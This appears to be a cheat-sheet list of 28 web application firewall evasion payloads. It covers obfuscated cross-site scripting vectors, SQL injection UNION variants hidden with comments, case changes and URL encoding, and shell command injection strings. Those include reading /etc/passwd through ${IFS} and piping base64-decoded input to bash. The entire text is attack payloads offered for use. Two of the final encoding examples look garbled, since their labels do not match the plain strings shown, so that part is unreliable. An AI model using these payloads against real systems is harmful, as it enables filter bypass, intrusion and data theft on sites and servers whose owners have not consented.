WAF evasion techniques for XSS, SQLi, RCE, and LFI payloads using encoding, comments, and alternative syntax. (28 payloads)
<svg/onload=alert(1)>
<img src=x oNeRrOr=alert(1)>
<script>alert`1`</script>
<script>\u0061lert(1)</script>
<script>eval(atob("YWxlcnQoMSk="))</script>
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">
<svg><animate onbegin=alert(1) attributeName=x></svg>
<math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">

' /*!UNION*/ /*!SELECT*/ 1,2,3--
'/**/UNION/**/SELECT/**/1,2,3--
' uNiOn SeLeCt 1,2,3--
' UN%49ON SEL%45CT 1,2,3--
' UNION%0ASELECT%0A1,2,3--
' /*!50000UNION*/ /*!50000SELECT*/ 1,2,3--
' UniOn(SeLeCt(1),(2),(3))--
' UNION ALL SELECT 1,2,3--

w'h'o'a'm'i
w\h\o\a\m\i
/???/??t /???/??????
cat${IFS}/etc/passwd
{echo,$(whoami)}
$(printf '\x69\x64')
base64 -d <<< "aWQ=" | bash
$0<<<$'\x69\x64'

Double URL encode: %253Cscript%253E
Unicode normalization: <script>alert(1)</script>
HTML entities in JS context: alert(1)
Overlong UTF-8: %C0%BCscript%C0%BE